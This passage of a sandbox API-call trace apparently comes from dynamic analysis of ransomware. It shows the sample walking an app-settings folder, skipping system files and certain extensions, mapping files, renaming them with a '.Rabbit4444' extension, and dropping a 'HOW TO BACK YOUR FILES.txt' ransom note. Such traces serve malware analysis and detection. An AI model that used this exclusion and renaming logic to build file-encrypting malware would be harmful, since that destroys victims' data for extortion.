MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.084] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.084] CloseHandle (hObject=0x2a0) returned 1 [0063.084] CloseHandle (hObject=0x298) returned 1 [0063.084] GetCurrentThreadId () returned 0xd98 [0063.084] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0063.084] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings" [0063.084] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.084] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0063.084] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings" [0063.084] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\" [0063.084] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0063.084] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.087] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.089] FlushFileBuffers (hFile=0x298) returned 1 [0063.090] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.090] CloseHandle (hObject=0x298) returned 1 [0063.091] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings") returned 92 [0063.091] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.091] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bcb41, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7136507a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeeed1de8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0063.091] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.091] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.091] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.091] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.091] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bcb41, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7136507a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeeed1de8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.091] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.091] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.091] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.091] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.091] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.091] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeed1de8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeed1de8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeed1de8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.091] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.091] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.091] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67a1999, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x67a1999, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x67a1999, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0063.091] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.091] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.091] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0063.091] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0063.091] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0063.091] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0063.091] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0063.092] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0063.092] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0063.092] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0063.092] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0063.092] lstrcpyW (in: lpString1=0x130ebf2, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0063.092] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0063.093] lstrlenW (lpString="roaming.lock") returned 12 [0063.093] lstrlenW (lpString="Rabbit4444") returned 10 [0063.093] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0063.093] lstrlenW (lpString=".dll") returned 4 [0063.093] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0063.093] lstrlenW (lpString=".lnk") returned 4 [0063.093] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0063.093] lstrlenW (lpString=".ini") returned 4 [0063.093] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0063.093] lstrlenW (lpString=".sys") returned 4 [0063.093] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0063.093] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66bcb41, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x968e9a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0063.093] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.093] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.093] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0063.093] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0063.093] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0063.093] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0063.093] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0063.093] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0063.093] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0063.093] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0063.093] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0063.093] lstrcpyW (in: lpString1=0x130ebf2, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0063.093] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0063.094] lstrlenW (lpString="settings.dat") returned 12 [0063.094] lstrlenW (lpString="Rabbit4444") returned 10 [0063.094] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0063.094] lstrlenW (lpString=".dll") returned 4 [0063.094] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0063.094] lstrlenW (lpString=".lnk") returned 4 [0063.094] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0063.094] lstrlenW (lpString=".ini") returned 4 [0063.094] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0063.094] lstrlenW (lpString=".sys") returned 4 [0063.094] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0063.094] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0063.094] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0063.094] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15440488992) returned 1 [0063.094] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0063.094] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0063.094] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0063.094] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0063.095] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0063.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123760 [0063.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0063.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0063.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0063.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0063.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0063.098] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15440857930) returned 1 [0063.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0063.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0063.098] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.098] CloseHandle (hObject=0x27c) returned 1 [0063.098] CloseHandle (hObject=0x2a0) returned 1 [0063.098] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 116 [0063.098] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0063.099] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5b325360, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x5b325360, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x5b325360, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0063.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0063.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0063.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0063.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0063.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0063.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0063.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0063.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0063.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0063.099] lstrcpyW (in: lpString1=0x130ebf2, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0063.099] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0063.100] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0063.100] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0063.100] lstrlenW (lpString="Rabbit4444") returned 10 [0063.100] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0063.100] lstrlenW (lpString=".dll") returned 4 [0063.101] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0063.101] lstrlenW (lpString=".lnk") returned 4 [0063.101] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0063.101] lstrlenW (lpString=".ini") returned 4 [0063.101] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0063.101] lstrlenW (lpString=".sys") returned 4 [0063.101] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0063.101] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0063.101] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0063.101] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15441178562) returned 1 [0063.101] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0063.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0063.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0063.101] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0063.107] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0063.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123760 [0063.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0063.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.109] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0063.109] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0063.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0063.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0063.109] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15441966710) returned 1 [0063.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0063.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0063.109] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.109] CloseHandle (hObject=0x27c) returned 1 [0063.109] CloseHandle (hObject=0x2a0) returned 1 [0063.109] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444") returned 121 [0063.109] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0063.110] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5b325360, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x5b325360, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x5b325360, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0063.110] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.110] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.110] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0063.110] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0063.110] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0063.110] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0063.110] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0063.110] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0063.110] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0063.110] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0063.110] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0063.110] lstrcpyW (in: lpString1=0x130ebf2, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0063.110] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0063.111] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0063.111] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0063.111] lstrlenW (lpString="Rabbit4444") returned 10 [0063.111] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0063.112] lstrlenW (lpString=".dll") returned 4 [0063.112] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0063.112] lstrlenW (lpString=".lnk") returned 4 [0063.112] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0063.112] lstrlenW (lpString=".ini") returned 4 [0063.112] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0063.112] lstrlenW (lpString=".sys") returned 4 [0063.112] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0063.112] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5b325360, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x5b325360, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x5b325360, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0063.112] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0063.112] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.112] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.112] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.112] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.114] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.114] CloseHandle (hObject=0x2a0) returned 1 [0063.114] CloseHandle (hObject=0x298) returned 1 [0063.114] GetCurrentThreadId () returned 0xd98 [0063.114] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fc8 [0063.114] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState" [0063.114] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116450 | out: 